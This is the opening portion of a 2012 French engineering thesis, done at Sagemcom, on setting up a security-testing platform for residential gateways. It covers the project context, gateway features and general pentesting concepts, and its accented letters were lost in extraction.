Vous êtes sur la page 1sur 102

Ministre de lEnseignement Suprieur et de la Recherche Scientifique Universit de Carthage Institut National des Sciences Appliques et de Technologie

Projet de Fin dEtudes


Pour lobtention du Diplme National dIngnieur en Sciences Appliques et en Technologie

Filire : Rseaux informatiques et tlcommunications Sujet :

Mise en place dune solution de tests de scurit pour les passerelles rsidentielles
Ralis par : Salmen HITANA
Entreprise daccueil :

Soutenu le 25/01/2012

Responsables entreprise : Raouf BEN SAD Dorra BEN AMARA Responsable INSAT: Kamel KAROUI Anne Universitaire : 2011/2012

: . ( ). () UPnP : . . : Mise en place dune solution de tests de scurit pour les passerelles rsidentielles Rsum: Le prsent travail, effectu au sein de lentreprise "SagemCom", entre dans le cadre du projet de fin dtudes pour lobtention du diplme national dingnieur en Rseau Informatique et Tlcommunication. Lobjectif de ce projet est la mise en place dune solution de tests de scurit pour les terminaux rsidentiels. Ces terminaux sont le cur mme de tout rseau particulier ou professionnel. Conscient du fait que les passerelles sont hautement exposes aux risques lis la scurit informatique, ce plan va couvrir des scnarios envisageables et toucher toutes les fonctionnalits de la passerelle (accs rseau, Wifi, UPnP, VoIP, IHM). Ces tests seront finalement lancs sur une panoplie de produits SagemCom (diffrents types des TRs) permettant de valider la pertinence de lenvironnement de test propos. Mots-cls : terminaux rsidentiels, scurit, pentesting, exploits, failles

Set up of a security test plan for residential gateways Abstract: This work, done within the company "Sagemcom" is part of the project for obtaining Computer and Network Engineer Telecommunication National Graduation. The objective of this project is the establishment of a security testing solution for residential terminals. These terminals are the heart of any particular or professional network. Aware that the bridges are highly exposed to risks related to computer security, a test plan will cover possible scenarios and touch all functionality of the gateway (network access, WiFi, UPnP, VoIP, IHM). These tests will eventually be launched on a wide range of Sagemcom products to validate the proposed test environment. Key Word: Gateway, Security, hacking, pentesting, vulnerability Intitule et adresse complte de lentreprise : Entreprise : SagemCom Adresse : 34, avenue de Paris, 2033 Megrine, Ben Arous, Tunisie Tl. : +216 71 297 100 Fax : Email : stages-sst@sagemcom.com

Remerciements

u terme de ce projet de fin dtudes, mes vifs remerciements sont ddis tous ceux qui ont contribu, directement ou indirectement llaboration

de ce projet.

En premier lieu, jexprime ma gratitude au Docteur Kamel KAROUI pour sa confiance, ses directives, ses conseils et pour mavoir accord son temps.

Je voudrais galement exprimer ma reconnaissance envers M. Raouf BEN SAD et Mlle. Dorra BEN AMARA qui m ont

encadr pendant ce projet avec beaucoup de disponibilit.

Je voudrais tmoigner par la suite ma reconnaissance toutes les personnes qui mont galement fait bnficier de leurs conseils et de leurs expriences en particulier M. Zied TLILI, ingnieur validation chez SagemCom.

Toutefois, il faut souligner que ce travail naurait pu voir le jour sans le savoir faire acquis dans mon honorable institut lInstitut National des Sciences Appliques et de Technologie. Cest donc avec une immense fiert que jadresse mes remerciements les plus distingus tous mes enseignants.

Table des Matires

................................................................................................................... 1 ...................................................................................................... 4 1.PRESENTATION DE LORGANISME DACCUEIL ............................................................ 4


1.1.SagemCom Tunisie .......................................................................................................................... 5 1.2.Sagemcom Software & Technologies ............................................................................................. 5

2.PRESENTATION DU PROJET ............................................................................................. 6


2.1.Contexte du projet............................................................................................................................ 6 2.2.Objectifs du projet ........................................................................................................................... 7 2.3.Planification du droulement du projet ........................................................................................ 7

CONCLUSION ............................................................................................................................ 8 ............................................................................................................. 9 1.LES TERMINAUX RESIDENTIELS ..................................................................................... 9


1.1.Prsentation des Terminaux Rsidentiels: .................................................................................... 9 1.2.Les TRs SagemCom ........................................................................................................................ 10 1.2.1.Accs internet haut dbit...................................................................................................... 10 1.2.2.Tlphonie ............................................................................................................................. 10 1.2.3.TV sur IP ................................................................................................................................. 11 1.2.4.Connectivit ........................................................................................................................... 11 1.2.5.Autres utilitaires et services ................................................................................................ 12

2.TESTS DE PENETRATION (PENTESTING) ...................................................................14


2.1.Prsentation du pentesting .......................................................................................................... 14 2.2.Types du Pentesting ................................................................................................................. 14 2.3.Pentesting : Mthodologie et standard ........................................................................................ 15 2.3.1.OSSTMM .................................................................................................................................. 15 2.3.2.OWASP .................................................................................................................................... 16 2.3.3.Autres standards et mthodologies: ................................................................................... 17

CONCLUSION ..........................................................................................................................17 ..............19 1.MODULE RESEAU...............................................................................................................20


1.1.Ports, services et OS ....................................................................................................................... 20 1.1.1.Scan des ports ........................................................................................................................ 21 1.1.2.Scan des services ................................................................................................................... 25 1.1.3.Dtection dOS ....................................................................................................................... 26

Page i

Table des Matires


1.1.4.Outils de scan des ports ........................................................................................................ 26 1.2.Scan des vulnrabilits ................................................................................................................. 27 1.2.1.Types de scan des vulnrabilits ......................................................................................... 28 1.2.2.Outils de scan des vulnrabilits ......................................................................................... 29 1.3.Exploits et autres types dattaques .............................................................................................. 33 1.3.1.Exploits ................................................................................................................................... 33 1.3.2.Autres types dattaques ........................................................................................................ 33

2.MODULE UPNP ...................................................................................................................34


2.1.Prsentation................................................................................................................................... 34 2.2.Risques et vulnrabilits ............................................................................................................... 35 2.3.Outils de tests ................................................................................................................................. 37

3.MODULE WIFI.....................................................................................................................38
3.1.Prsentation................................................................................................................................... 38 3.2.Risques et vulnrabilits ............................................................................................................... 39 3.3.Outils de tests ................................................................................................................................. 40

4.MODULE VOIP ....................................................................................................................41


4.1.Prsentation................................................................................................................................... 41 4.2.Protocole VoIP................................................................................................................................ 41 4.3.Risques et vulnrabilits ............................................................................................................... 43 4.4.Outils de tests ................................................................................................................................. 44

CONCLUSION ..........................................................................................................................45

.........................................................................................46 1.ENVIRONNEMENT DE TEST ............................................................................................47


1.1.Environnement matriel ............................................................................................................... 47 1.2.Environnement logiciel ................................................................................................................. 47 1.2.1.Les systmes dexploitation ddis scurit ...................................................................... 47 1.2.2.Choix du systme dexploitation le plus adquat .............................................................. 48 1.3.Architecture rseau de la plateforme de tests............................................................................. 49

2.MODULE RESEAU...............................................................................................................50
2.1.Scan des ports, services et OS........................................................................................................ 50 2.1.1.Outils de tests......................................................................................................................... 50 2.1.2.Tests raliss ......................................................................................................................... 51 2.1.3.Profils de scan Zenmap ......................................................................................................... 55 2.2.Scan des vulnrabilits ................................................................................................................. 56 2.2.1.Scanneurs des vulnrabilits automatiques ...................................................................... 57 2.2.2.Scanneurs des vulnrabilits Web ...................................................................................... 60

Page ii

Table des Matires


2.3.Attaques et exploits ....................................................................................................................... 62 2.3.1.Outils de tests ........................................................................................................................ 63 2.3.2.Tests raliss ......................................................................................................................... 63 2.3.3.Anciennes attaques ............................................................................................................... 71

3.MODULE UPNP ...................................................................................................................73


3.1.Prsentation des tests ................................................................................................................... 73 3.2.Tests realiss.................................................................................................................................. 73

4.MODULE WIFI.....................................................................................................................75
4.1.Prsentation des tests ................................................................................................................... 75 4.2.Tests raliss.................................................................................................................................. 76

4.MODULE VOIP ....................................................................................................................78


4.1.Prsentation des tests ................................................................................................................... 78 4.2.Tests raliss.................................................................................................................................. 78 4.2.1.Dni de service....................................................................................................................... 78 4.2.2.Vol de session......................................................................................................................... 79

CONCLUSION ..........................................................................................................................80 ...............................................................................81 ...................................................................................................................82 ..............................................................................................................................85


............................................................................................... 88 ............................................................................. 89 ....................................................................... 89 ............................................ 91 ................................................................ 92

Page iii

Liste des Figures

Figure 1 : Logo SagemCom ................................................................................................................4 Figure 2 : Organigramme de SagemCom .............................................................................................5 Figure 3 : Produits SagemCom ............................................................................................................6 Figure 4 : Diagramme de Gantt reprsentant les principales tapes du projet .......................................8 Figure 5 : Connectivit et services des TRs SagemCom..................................................................... 11 Figure 6 : TCP Scan (sur un port ouvert) ........................................................................................... 22 Figure 7 : SYN Scan (sur un port ouvert) .......................................................................................... 22 Figure 8 : Fin Scan (sur un port ouvert) ............................................................................................. 23 Figure 9 : XMAS Scan (sur un port ouvert) ....................................................................................... 23 Figure 10 : TCP Null Scan (sur un port ouvert) ................................................................................. 23 Figure 11 : Utiliser un port source autoris pendant le scan ............................................................... 24 Figure 12 : Scan ACK ....................................................................................................................... 24 Figure 13 : Evaluation des resultats ................................................................................................... 32 Figure 14 : Temps d'excutions du scan ............................................................................................ 32 Figure 15 : Principaux profils UPnP et actions .................................................................................. 35 Figure 16 : Redirection vers une autre adresse locale ......................................................................... 36 Figure 17 : Redirection vers l'adresse locale du TR ........................................................................... 36 Figure 18 : Redirection vers une autre adresse WAN ......................................................................... 37 Figure 19 : Exemple d'appel .............................................................................................................. 43 Figure 20 : Logo BackTrack ............................................................................................................. 48 Figure 21 : Menu BackTrack............................................................................................................. 49 Figure 22 : Architecture rseau de la plateforme de test ..................................................................... 49 Figure 23 : Profil Zenmap ................................................................................................................. 51

Page iv

Liste des Figures


Figure 24 : Rsultat dun simple scan des ports et services ................................................................ 54 Figure 25 : Exemple dtection d'OS .................................................................................................. 55 Figure 26 : Page de connexion .......................................................................................................... 58 Figure 27 : Crer profile.................................................................................................................... 58 Figure 28 : Configuration des plugins................................................................................................ 59 Figure 29 : Exemple du rsultat ......................................................................................................... 60 Figure 30 : Exemple Fuzzing ............................................................................................................ 61 Figure 31 : Architecture rseau de l'attaque ....................................................................................... 64 Figure 32 : Fenetre XCHAT (Administrateur) ................................................................................... 64 Figure 33 : Interface LOIC ................................................................................................................ 65 Figure 34 : Lancement de l'attaque .................................................................................................... 66 Figure 35 : Capture de trafic lors de l'attaque..................................................................................... 71 Figure 36 : Attaque base de lIP Spoofing....................................................................................... 72 Figure 37 : Dtection des quipements UPnP sur le rseau ................................................................ 74 Figure 38 : Action AddPortMapping ................................................................................................. 74 Figure 39 : Actions GetSpecificPortMapping et GetGenricPortMapping............................................ 75 Figure 40 : Capture de messages de signalisation (SIP) ..................................................................... 79

Page v

Liste des Tables

Tableau 1 : Rgles du pare-feu .......................................................................................................... 12 Tableau 2 : Classification OSSTMM ................................................................................................. 16 Tableau 3 : Etat du port par type du scan et rponse .......................................................................... 25 Tableau 4 : Tableau comparatif des outils de scan ............................................................................. 27 Tableau 5 : Tableau comparatif des scanneurs des vulnrabilits automatiques. ................................. 31 Tableau 6 : Liste des outils et leurs critres. ...................................................................................... 31 Tableau 7 : Requtes SIP .................................................................................................................. 42 Tableau 8 : Codes de rponses SIP .................................................................................................... 42 Tableau 10 : Tests owasp raliss ...................................................................................................... 61 Tableau 11 : Liste des tests ............................................................................................................... 88

Page vi

Introduction

est en pleine guerre froide que linternet est ne, est ce pour maintenir les tlcommunications oprationnelles et pares toute preuve en cas dune apocalypse des suites de lexcution des menaces Amricano-Russe sur le monde: La grande phobie, tait

lpoque, une attaque nuclaire... Heureusement pour le monde, rien ne ft En 1969, le rseau internet comptait alors, uniquement quatre machines et tait restreint, limit, et bien sur ferm sur le monde extrieur. Avec lamlioration des quipements et des technologies de communication, linternet tait de moins en moins une innovation rserve une lite de militaires et de scientifiques et souvrait peu peu au grand public et ce avec la naissance du premier rseau international aiguillage de paquets en 1978, ladoption dun protocole unique de transport -TCP/IP- en 1983 et du web en 1989 [1] et de la monte de lintrt commercial quoffrait une pareille technologie. Cest ainsi quen 1989 que le premier fournisseur daccs internet via le rseau tlphonique vit le jour : la compagnie Amricaine The World avait alors ouvert la voie une vritable explosion de fournisseurs de services internet partout dans le monde [2] qui proposaient leurs clients des dbits de plus en plus levs, et ce en jouant sur les technologies daccs internet, ainsi que des services de plus en plus diversifis. En effet, lvolution des technologies de transmission de donnes telles que limage et le son ainsi que la multitude dinnovations et dinventions qui ont vu le jour lgard des passerelles rsidentielles, des tlphones sur IP, des dcodeurs IP, des tlphones intelligents et autres tablettes tous capable de se connecter au rseaux de donnes mondial totalement boulevers lexprience des utilisateurs de lInternet. Ainsi de nos jours, les fournisseurs daccs internet (FAI) offrent plusieurs services autres que le simple accs internet dont le fameux Triple Play, qui nest rien de plus quune offre commerciale et dont le succs nest plus prouver : plus de vingt millions dabonns, rien quen France [3]. Cette offre inclut laccs internet, la tlphonie sur IP et la tlvision numrique sur IP, indpendamment de la technologie de transport utilise par loprateur pour connecter son client au rseau Internet. Pour parvenir leurs fins, les FAI commercialisent trs souvent leurs offres avec une passerelle rsidentielle adapte aux services quils dsirent proposer ainsi quaux types de technologies quils possdent pour le bon acheminement et fonctionnement de ces derniers. La

Page 1

Introduction
passerelle en question, sera alors, le vritable cur de tout le rseau local et la borne de tous les services utiliss par le client final. En fait, la passerelle rsidentielle permet de partager la connexion Internet entre tous les ordinateurs du rseau avec ou sans cbles. Elle permet galement de connecter des tlphones et terminaux analogiques pour accder des services de tlphonie sur IP (VoIP) et ce via la ligne daccs (XDSL, FTTH, Cble, etc). De plus, des quipements comme les dcodeurs peuvent tre connects ces terminaux pour offrir des services supplmentaires comme la Tlvision et la Vido la Demande (ou ultrieurement la visiophonie). Cette multitude de services proposs et connects en permanence au rseau Internet pose de plus en plus le problme de la scurit informatique vu la diversification des services tournant sur la passerelle et sur les diffrents lments du rseau local du client ainsi que suite aux constats suivants : la protection des systmes informatiques, vis--vis des menaces planant sur ces derniers suite leur ouverture sur le monde numrique, est loin dtre parfaite. le nombre d'incidents et de vulnrabilits ne cesse de crotre [4]. Cette augmentation na malheureusement pas t accompagne par des contre-mesures adquates au niveau des particuliers et des entreprises puisque, dune part, ils n'appliquent pas une politique de scurit efficace pour protger leurs systmes informatiques faute de sensibilisation aux risques encourus et dautre part, ils sont incapables de suivre le rythme dapparition des vulnrabilits vu que les mcanismes de scurit traditionnels sont aujourdhui, de plus en plus, contourns. Dans un pareil contexte la passerelle rsidentielle doit tre le premier rempart contre les risques scuritaires provenant de linternet. Par consquent, et dans le souci de construire des quipements dont la scurit nest non seulement infaillible mais aussi le plus jour possible et de les proposer ces principaux clients, Sagemcom, constructeur de passerelles rsidentielles de renomme mondiale et un des principaux fournisseurs des FAI tel que Orange (France, Tunisie) , Bouygues Telecom (France), Deutsch Telekom (Allemagne), TDC ( Danemark) , Bell Canada ( Canada ), etc, se propose de mettre en place une solution de test de scurit et de pntrations pour ses terminaux afin de garantir leur bon fonctionnement et leur haute disponibilit face des attaques connues lors des phases de dveloppement et de validation des produits. Et cest dans ce cadre, que se situe notre projet de fin dtudes, effectu au sein de la socit SagemCom qui a pour objectif dtablir ltude, le benchmarking et la mise en place de plusieurs

Page 2

Introduction
outils daudit de scurit ainsi que llaboration dun plan de tests couvrant les principales failles et risques connus. Le prsent rapport organis en quatre chapitres, prsente les diffrentes tapes du droulement du projet. Dans un premier temps une prsentation du contexte du projet illustre notre travail. Le deuxime chapitre est consacr la prsentation des terminaux rsidentiels ainsi que les tests de scurit ou le pentesting. Le troisime chapitre sera rserv la description des diffrents modules prsents sur les passerelles rsidentielles, les risques qui se posent et le benchmarking des outils possibles pour raliser des tests de pntration sur celles ci. Finalement, le quatrime chapitre, est consacr la mise en place de notre solution de tests de scurit des passerelles rsidentielles.

Page 3

Chapitre 1

Contexte du projet

Ce premier chapitre est consacr la prsentation du contexte gnral du projet. Le travail ayant t ralis au sein de la socit SagemCom, nous commencerons donc, par une prsentation gnrale de lorganisme daccueil. Ensuite, nous entamerons une description de notre projet afin dexpliciter son contexte, son objectif ainsi que les diffrentes tapes identifies afin de parfaire notre ce stage.

1. Prsentation de lorganisme daccueil

Figure 1 Logo SagemCom

Groupe franais de haute technologie dimension internationale, Sagemcom opre sur les marchs du haut-dbit (maison numrique, dcodeurs, box Internet, tlphonie et terminaux

Page 4

Chapitre 1

Contexte du projet

multimdia), des tlcoms, de lnergie (M2M1, infrastructures tlcoms, compteurs communicants et management de lnergie) et de la gestion de documents (terminaux dimpression, logiciels et solutions, dmatrialisation). Le groupe Sagemcom est compos d'une soixantaine d'entits, prsentes dans plus de 40 pays. En Afrique, la seule entit est implmente en Tunisie, SagemCom Tunisie et SagemCom Software & Technologies. Ci-dessous lorganigramme de SagemCom :

Figure 2 Organigramme de SagemCom

1.1.

SagemCom Tunisie

SagemCom est une nouvelle unit industrielle offshore, spcialise dans llectronique et les quipements de tlcommunications. Elle a t officiellement inaugure le 10 juin 2003 Ben Arous . Cette unit produit essentiellement des rcepteurs tlcommande centralise, des cbles en fibres optiques et des cartes magntiques (5 millions de cartes par an) et 1,5 million de produits finis. Lunit emploie plus de 1600 personnes dont plus de 270 ingnieurs et techniciens suprieurs. SagemCom est aussi un acteur majeur dans les domaines de la communication mobile et de la communication haut dbit, ayant acquis des positions mondiales grce un fort potentiel dinnovation.

1.2.

Sagemcom Software & Technologies

Sagem Software et Technologies (SS&T) est un centre de recherche et de dveloppement qui a t cr le 18 juillet 2005. Elle opre dans le domaine des tlcommunications, du traitement et de la transmission numrique de linformation et des dveloppements axs sur les technologies mergentes. Cette cellule internationale emploie plus de 350 ingnieurs spcialiss dans :

M2M : Le concept de machine to machine, utilise les tlcommunications et l'informatique pour permettre des communications entre machines, et ceci sans intervention humaine.

Page 5

Chapitre 1

Contexte du projet

La conception et le dveloppement de logiciels pour les dcodeurs TV numriques sous Linux embarqu. Le dveloppement des Drivers Windows et des logiciels dinstallation des quipements Sagemcom lgard des terminaux dimpression. Le test, lintgration et la validation dquipements et de systmes de tlcommunications dont les passerelles rsidentielles.

Figure 3 Produits SagemCom

2. Prsentation du projet
Au cours de cette section, nous prsentons le contexte de notre projet et ses objectifs. Le planning du travail est dtaill par la suite.

2.1.

Contexte du projet

Les terminaux rsidentiels Sagemcom offrent des solutions haute connectivit moyennant diverses technologies daccs et une multitude de services. Ces terminaux sont le cur mme de tout rseau particulier ou professionnel. Conscient du fait que les passerelles sont hautement exposes aux risques lis la scurit informatique (le piratage, lintrusion et lingnierie inverse, etc) et afin de proposer des produits hautement scuriss ses clients particuliers et professionnels, Sagemcom propose dlaborer, au sein dun projet de fin dtudes, le benchmarking, ltude et la mise en place de plusieurs outils de tests de scurit. Ce projet sera concrtis par la mise en place dun plan de test couvrant les principales failles et risques connus se basant sur ltat de lart actuel. Ainsi que la mise en place des outils choisis, dans une position de test. Un plan de test sera finalement lanc sur une panoplie de produits Sagemcom permettant de valider la pertinence de lenvironnement de test propos. Suite aux rsultats obtenus, une analyse objective devra tre tablie en vue de dgager les points forts et faibles de la solution choisie, ainsi que la pertinence des rsultats des tests effectus.

Page 6

Chapitre 1

Contexte du projet

2.2.

Objectifs du projet

Afin datteindre lobjectif principal du projet, qui consiste la mise en place dune plateforme de tests de scurit et la dfinition dun plan de tests qui couvre la quasi-totalit des failles et vulnrabilits possibles sur les Terminaux rsidentiels, il faut assurer les sous-objectifs suivants : Etablir un tat de lart en matire de piratage, intrusion, rtro ingnierie, etc touchant les principaux axes de connectivits et des services offerts par les passerelles rsidentielles. Etablir une liste doutils libres assurant le dploiement des attaques dtermines par ltat de lart et par la suite raliser un comparatif des outils disponibles et se fixer des choix optimums bass sur lefficacit, la facilit de dploiement, la personnalisation, la popularit, etc.) Dgager un plan de test clair assurant un test complet des produits sous tests. Ce plan va couvrir jusqu 90% des scnarios envisageables et toucher toutes les fonctionnalits de la passerelle (accs rseau, Wifi, UPnP, VoIP, IHM) Dployer les outils sur une position de test et les personnaliser pour rpondre aux besoins de scurit soulevs dans les premiers chapitres et assurer une couverture optimale en adquation avec le plan de tests dfini. Drouler une campagne de tests, sur au moins trois produits, bas sur le plan de test dfini et les outils mis en place. Une analyse des rsultats va tre tablie et une critique objective sera porte sur la plateforme et le plan de test en vue de la raffiner et rajuster, sil est ncessaire.

2.3.

Planification du droulement du projet

Ce projet est divis en cinq parties : Etape 1 : Documentation sur les passerelles rsidentielles (produits Sagemcom) Etape 2 : Etude sur les diffrents attaques et failles possibles sur les TRs. Etape 3 : Choix dune liste doutils assurant les attaques dtermines dans ltat de lart et la mise en place dune plateforme de tests de scurit Etape 4 : Dfinition dun plan de test clair qui couvre les services cibles dattaques et qui assure un audit complet des produits sous tests. Etape 5 : Droulement dune campagne base sur le plan de test dfini. En vue de modliser cette organisation, nous avons eu recours loutil de gestion de projet SodeaSoft Gnt Planning (Voir figure 4).

Page 7

Chapitre 1

Contexte du projet

Figure 4 Diagramme de Gantt reprsentant les principales tapes du projet

Conclusion
Dans ce premier chapitre, nous avons prsent la socit SagemCom. Ensuite Nous avons dtaill le cadre du projet, et expliciter la problmatique rsoudre. Finalement, nous avons dcrit les diffrentes tapes du projet. Le chapitre suivant sera donc consacr aux notions de base relatives notre projet, notamment la description des terminaux rsidentiels et les notions relatives aux tests de pntrations ou en terme anglo-saxon le pentesting.

Page 8

Chapitre 2

Concepts de base

Dans ce chapitre, nous entamerons par une description des passerelles rsidentielles (ou terminaux rsidentiels), de leurs caractristiques fonctionnelles et de leur importance grandissante dans la vie quotidienne, grce entre autres leur rle dans toute offre daccs aux services Internet. Par la suite, nous prsenterons les tests de pntrations, en mettant en vidence leur intrt, vu la haute exposition des passerelles aux risques lis la scurit informatique.

1. Les terminaux rsidentiels


1.1. Prsentation des Terminaux Rsidentiels:

Un Terminal rsidentiel (TR) ou passerelle est un point du rseau qui agit comme une entre vers un autre rseau. Dans un rseau dentreprise ou domestique, les passerelles offrent laccs aux utilisateurs du rseau local vers le rseau WAN (internet). Une passerelle typique contient des fonctionnalits basiques pour une utilisation simple, ainsi elle offre au moins un ensemble des services suivants: Accs internet via fibre optique (FTTH) ou ligne xDSL. Rseau local cbl et point daccs WIFI pour assurer la connectivit entre plusieurs quipements (ordinateur portable, Tablet PC, Smart phone, etc).

Page 9

Chapitre 2

Concepts de base

DHCP (Dynamic Host Configuration Protocol) pour offrir une configuration de rseau TCP/IP fiable et simple, empchant les conflits d'adresses et permettant le contrle de l'utilisation des adresses IP de faon centralise.

NAT (Network Address Translation) pour dployer ou hberger des applications et des services au sein dun rseau local afin de les rendre accessibles de lextrieur. Firewall pour scuriser le rseau local des attaques provenant de linternet.

En plus de ces fonctionnalits basiques, les TRs offrent aussi les services suivants, selon les exigences du fournisseur daccs internet et de ses abonns : Voix sur IP (VoIP). Service TV sur IP. DNS dynamique pour permettre laccs distance un quelconque service hberg en local par lutilisateur. UPnP pour interconnecter dautres quipements tels que les priphriques de stockage, console de jeux, tlphone UPnP, etc.

1.2.

Les TRs SagemCom

Comme tant un leader mondial sur le march des terminaux, SagemCom conoit, produit et met disposition des oprateurs et des fournisseurs de services internet une gamme complte de home Gateway permettant de mettre en uvre de services daccs haut dbit et de solutions pour le rseau numrique local [5]. Dans ce qui suit, nous allons introduire et dcrire les diffrents modules et fonctionnalits principalement offertes par ces TRs (Voir figure 5).

1.2.1. Accs internet haut dbit


Dot dune interface WAN universel (ADSL / ADSL2 / ADSL2+/VDSL2 et FTTH), les TRs SagemCom permettent son utilisateur de bnficier dun accs internet haut dbit atteignant les 100 Mo/s pour exploiter les nouvelles technologies telles que la tlvision et la tlphonie via internet etc.

1.2.2. Tlphonie
Les TRs SagemCom implmentent diverses technologies de tlphonie telles que la tlphonie classique, fax compris, et la Voix sur IP. Pour exploiter ces technologies les TRs SagemCom offrent aux utilisateurs la possibilit de connecter plusieurs types dappareils tlphoniques (IP Phone, DECT, tlphone, Fax).

Page 10

Chapitre 2

Concepts de base

Figure 5 Connectivit et services des TRs SagemCom

1.2.3. TV sur IP
Les TRs SagemCom offrent la possibilit de sabonner des flux IP TV. Via une SetTopBox connecte au TR lutilisateur peut visualiser des flux vido soit en multicast soit la demande (VOD).

1.2.4. Connectivit
Rseau local cbl
Les TRs SagemCom offre une solution complte pour linterconnexion entre les diffrents quipements via les interfaces Ethernet disponibles.

Page 11

Chapitre 2 Rseau sans fil (WIFI)

Concepts de base

Les TRs SagemCom offrent la possibilit dinterconnecter les priphriques sans fils via le WIFI. Ces TRs utilisent les trois normes connues du WIFI 802.11 b/g/n avec un dbit qui peut atteindre les 300MO/sec.

USB
Afin dassurer la connectivit des diffrents quipements multimdia (imprimante, disque dur, console de jeux, etc), les TR SagemCom utilise le protocole UPnP ainsi quun serveur DLNA pour le partage de contenus multimdias.

1.2.5. Autres utilitaires et services


DHCP
Le TR SagemCom est la fois un client DHCP et un serveur DHCP. A la mise sous tension, le TR, comme tant un client DHCP, rcupre les paramtres de connexion de son fournisseur daccs internet tels que ladresse IP publique, la passerelle par dfaut, le serveur DNS, le serveur NTP, etc. Comme tant un serveur DHCP, le TR fournit aux quipements connects travers le rseau local (sans fil et cbl) des paramtres de connexion tels que la plage dadresse utiliser, la passerelle par dfaut, etc.

Firewall
Afin dassurer la scurit du rseau local et le protger des attaques provenant de lextrieur, les TRs SagemCom implmentent un pare-feu logiciel assurant trois niveaux de scurit:
Niveau de scurit Elev Moyen Bas Trafic entrant rejeter rejeter accepter trafic sortant rejeter accepter accepter remarque pour le trafic sortant, sauf pour les services suivants HTTP, HTTPS, Telnet, FTP, DNS, IMAP, POP3, SMTP. -

Tableau 1 Rgles du pare-feu

DMZ
La DMZ ou une zone dmilitarise est un sous-rseau spar du rseau local et isol de celuici et d'Internet par un pare-feu. Ce sous-rseau contient les machines tant susceptibles d'tre accdes depuis Internet. Les TRs SagemCom offrent ce service dune faon limite, o on ne peut configurer quun seul PC comme DMZ (une seule adresse IP et non pas un sous rseau).

Page 12

Chapitre 2 Port Forwarding

Concepts de base

Le Port Forwarding ou redirection de port consiste rediriger les paquets reus dun ordinateur sur un port bien dfini vers un autre ordinateur sur un autre port donn. Le Port Forwarding est la combinaison de trois techniques : La translation dadresse ou/et du port dans les paquets reues vers une autre destination. Lacceptation des quelques paquets en se basant sur les rgles du pare-feu. Le routage des paquets suivant le table de routage.

DNS dynamique
Le DNS dynamique est une mthode qui permet un utilisateur dattacher un nom de domaine une adresse IP WAN (reue de la part du FAI) sans se proccuper du changement de cette adresse. Ainsi, on peut hberger un serveur web, ftp ou nimporte quelle autre application internet dans le rseau local et y accder travers ce nom de domaine. Cette fonctionnalit est configurable dune faon trs simple, il suffit de choisir le fournisseur de service (no-ip, DynDns.org,) et de donner le login, le mot de passe et le nom de domaine personnel.

Configuration et approvisionnement automatique de services


La gamme des services offerts par les TRs devient de plus en plus complexe et par consquent elle impacte la simplicit de la configuration distance. Lintgration des technologies TR-069 facilite linstallation et lapprovisionnement automatique des services. La configuration et la mise jour du TR se fait distance et dune faon automatique selon le contrat entre labonn et son FAI. Cette fonctionnalit est trs importante pour les deux parties du contrat pour plusieurs raisons, parmi lesquelles on cite : La facilit de la tche de configuration pour labonn. Lactivation ou la dsactivation des services selon le contrat.

Interface dadministration
Interface WEB ou GUI : les TRs SagemCom offre un site web en local pour la configuration. Laccs se fait par un navigateur (Firefox, chrome, etc) en introduisant un login et un mot de passe. Telnet : Via un PC connect en local, un utilisateur (avanc) peut accder au TR travers Telnet pour ladministrer et le configurer. SSH : un utilisateur peut accder dune faon scurise avec SSH pour administrer et configurer le TR.

Page 13

Chapitre 2

Concepts de base

2. Tests de pntration (Pentesting)


Vu que les TRs SagemCom offrent des solutions haute connectivit travers ses services, ils sont hautement exposs aux risques lis la scurit informatique. Il est indispensable de vrifier leur immunit face ces risques rels et consistants. Pour cela, on a recours des normes et des standards dans le domaine de la scurit informatique afin de remplir cette tche.

2.1.

Prsentation du pentesting

Les tests de pntration ou Pentesting est un ensemble de tests traduisant une mthode d'valuation de la scurit d'un systme informatique ou rseau en simulant une attaque malicieuse de lextrieur et les employs malveillants de lintrieur. Le processus implique une analyse active du systme pour toutes les vulnrabilits potentielles qui pourraient rsulter de la faiblesse de la configuration du systme et des dfaillances lies aux dfauts connus du hardware ou du software utiliss. Cette analyse est effectue en simulant un attaquant potentiel et peut dgager des exploitations et des vulnrabilits au sein du systme. Les problmes lis la scurit du systme rvls travers les tests de pntration sont prsents au propritaire. Afin de raliser des tests efficaces, le Pentester doit fournir des

valuations prcises et concrtes des impacts potentiels l'organisation et dfinir la gamme des contremesures techniques et procdurales pour rduire les risques. Les tests de pntration sont importants pour plusieurs raisons: Dterminer la faisabilit d'un ensemble d'attaques. Identifier les vulnrabilits haut risque qui rsultent d'une combinaison de quelques vulnrabilits, de faible et de moyen risque, exploitables dans un ordre particulier. Identifier les vulnrabilits qui peuvent tre difficiles ou impossibles dtecter avec des outils dauto-valuation des vulnrabilits. valuer l'ampleur de l'activit oprationnelle et les impacts potentiels dune ou plusieurs attaques russies. Tester la robustesse du mcanisme de la scurit mise en place au sein du systme.

2.2.

Types du Pentesting

Les tests de pntrations peuvent tre raliss de plusieurs faons. Gnralement, ils se diffrent en fonction du taux dinformations disponibles avant le dmarrage des tests. Dans ce cas, on peut parler des notions de boite noire ou boite blanche connue sous le nom de Black box testing et White box testing:

Page 14

Chapitre 2

Concepts de base

Black box testing : cest une mthode permettant de raliser des tests fonctionnels ou non fonctionnel s ne faisant pas rfrence aux structures internes du systme en question. On suppose que le systme est une sorte de boite noire sur laquelle on va essayer de dgager le maximum possible dinformations en se basant sur les rsultats fournis des tests dans la phase de collecte dinformations. Ces tests simulent une attaque ralise partir de lextrieur de lentreprise.

White box testing: Contrairement au Black box testing, le White box testing est une mthode de pentesting permettant de faire des tests sur un systme dont on connait le fonctionnement interne, larchitecture rseaux, lemplacement des serveurs, les systmes dexploitation utiliss, les langages de programmations des applications, les versions des logiciels, etc. Les tests raliss simulent des attaques partir de lintrieur en se basant sur des informations rcupres par le vol de documents, etc.

Les deux mthodes de pentesting Black & White sont complmentaires et essentielles au cours des testes de pntrations. Les tests des boites blanches sont ncessaires pour dterminer des failles et des vulnrabilits que les scanneurs des vulnrabilits automatiques ne peuvent pas dterminer. Linconvnient du White Box testing est que cette mthode est coteuse en temps car l'analyse manuelle est lente. De plus, si une erreur existe, il nest pas aussi facile de dterminer son exploitation [6].

2.3.

Pentesting : Mthodologie et standard

Quand il s'agit de tests de pntration, il n'y a pas une approche bien prcise suivre. Chaque rseau diffre des autres, chaque systme a ses propres spcifications et chaque entreprise a ses propres objectifs de scurit. Dans ce qui suit, nous allons prsenter quelques standards et mthodologies connus dans le monde de la scurit informatique.

2.3.1. OSSTMM
